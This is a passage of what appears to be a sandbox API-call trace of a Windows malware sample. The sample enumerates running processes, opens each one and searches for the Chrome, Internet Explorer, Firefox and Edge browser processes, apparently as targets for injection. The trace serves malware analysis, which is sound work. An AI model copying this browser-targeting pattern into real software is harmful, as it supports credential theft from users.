	[0197.715] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0197.715] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x1480
	[0197.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.716] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0197.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.716] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.716] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0197.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.717] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.717] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0197.718] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x1484
	[0197.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.718] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0197.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.718] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.718] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0197.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.719] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.719] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0197.719] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1488
	[0197.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.720] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0197.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.720] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.720] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0197.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.721] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.721] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0197.722] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x148c
	[0197.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.722] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0197.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.722] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.722] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0197.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.723] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.723] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0197.724] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1490
	[0197.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.724] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0197.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.724] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.724] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0197.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.725] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.725] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0197.726] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1494
	[0197.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.726] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0197.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.726] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.726] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0197.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.727] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.727] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.727] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x1498
	[0197.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.728] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.728] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.728] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.729] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.729] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.729] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x149c
	[0197.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.730] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.730] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.730] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.731] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.731] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.732] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x14a0
	[0197.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.732] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.732] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.732] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.733] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.733] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.734] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x14a4
	[0197.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.734] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.734] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.735] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.735] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.735] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.736] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x14a8
	[0197.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.736] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.736] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.737] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.737] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.737] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.738] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x14ac
	[0197.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.738] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.738] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.739] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.739] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.739] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.740] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x14b0
	[0197.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.740] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.740] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.741] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.741] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.741] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0197.742] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x14b4
	[0197.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.742] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0197.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.742] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.743] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0197.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.743] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.743] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.744] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x14b8
	[0197.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.744] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.744] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.745] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.745] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.745] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0197.746] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x14bc
	[0197.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.746] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.782] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.782] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.783] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.783] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0197.784] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x14c0
	[0197.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.784] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0197.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.784] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.784] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0197.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.785] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.785] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.786] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x14c4
	[0197.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.786] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.786] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.787] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.787] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.787] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0197.788] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x14c8
	[0197.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.788] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0197.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.788] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.789] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0197.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.789] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.789] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0197.790] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x14cc
	[0197.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.790] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0197.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.790] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.791] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0197.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.791] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.791] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0197.792] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x14d0
	[0197.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.792] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0197.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.792] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.792] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0197.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.793] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.793] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0197.794] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x14d4
	[0197.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.794] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0197.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.794] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.795] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0197.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.795] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.795] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0197.796] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0197.796] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0197.796] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x14d8
	[0197.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.797] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0197.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.797] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.798] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0197.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.798] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.799] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0197.800] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x14dc
	[0197.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.800] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0197.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.800] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.800] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0197.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.801] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.801] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0197.801] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x14e0
	[0197.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.802] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0197.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
